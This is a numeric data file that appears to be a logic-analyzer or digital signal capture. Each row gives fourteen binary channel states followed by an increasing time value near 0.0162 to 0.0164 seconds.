1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226760e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226780e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226808e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226836e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226860e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226884e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226908e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226932e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226960e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226980e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,1.6226988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226992e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227056e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227084e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227108e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227132e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227156e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227180e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227208e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227256e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227284e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227308e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227332e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227356e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227380e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227404e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227456e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227508e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227532e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227556e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227580e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227604e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227656e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227684e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227708e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227732e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227756e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227780e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227808e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227856e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227884e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227908e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227932e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6227956e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6227980e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228056e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228084e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228108e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228132e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228156e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228180e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228212e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228236e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228256e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228284e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228308e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6228332e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6228360e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,1.6228388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228392e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228464e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228516e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228540e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228664e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228684e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228716e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228740e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228864e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228888e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228940e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6228964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6228988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229064e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229088e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229116e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229140e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229188e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229260e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229284e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229312e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229336e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229388e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229512e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229536e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229660e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229684e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229712e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229736e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229860e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229884e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229912e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229936e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6229964e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6229988e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230060e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230084e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230112e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230136e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230164e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230188e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230260e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230284e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230312e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230336e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230388e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230512e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230536e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230660e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230684e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230712e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230788e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230832e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230852e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230912e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6230932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6230956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231060e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231084e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231104e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231124e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231216e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231240e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231260e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231284e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231332e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231352e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231372e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231396e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231420e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231444e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231464e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231512e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231536e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231564e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231588e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6231740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6231760e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6356644e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.6356812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6356836e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,1.6356856e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6356876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6357228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6357276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357300e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6357324e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6357376e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,1.6357428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,1.6357452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357852e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6357952e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6357976e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358052e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358104e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358232e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358256e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358308e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358360e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358384e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358412e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358436e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358460e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358484e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358508e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358560e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358588e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358612e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358636e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358712e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358736e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358764e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358788e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358836e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358912e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358936e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6358964e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6358988e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359036e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359060e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359112e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359140e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359188e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359212e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359260e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359288e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359340e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359364e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359412e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359436e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359460e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359484e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359512e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359536e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359564e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359588e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359612e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359636e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359712e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359736e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359764e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359788e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359812e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359836e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359912e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359936e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6359964e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6359988e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360012e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360036e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360084e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360112e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360136e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360164e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360188e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360212e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360236e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360260e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360284e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360312e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360336e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360388e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360412e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360436e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360484e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360512e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360536e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360564e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360588e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360612e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360636e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360660e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360684e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360712e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360736e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360764e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360788e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360812e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360836e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360860e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360884e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360912e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360936e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6360964e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6360988e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361012e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361036e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361060e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361084e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361112e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361136e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361164e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361188e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361212e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361236e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361260e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361284e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361312e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361336e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361364e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361388e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361412e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361436e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361484e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361512e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361536e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361564e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361588e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361612e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361636e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361660e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361684e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361712e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361736e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361764e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361788e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361812e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361836e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361860e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361884e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361912e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361936e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6361964e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6361988e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362012e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362036e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362060e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362140e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362164e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362192e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362216e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362244e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362268e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362292e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362316e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362340e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,1.6362364e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,1.6362392e-02 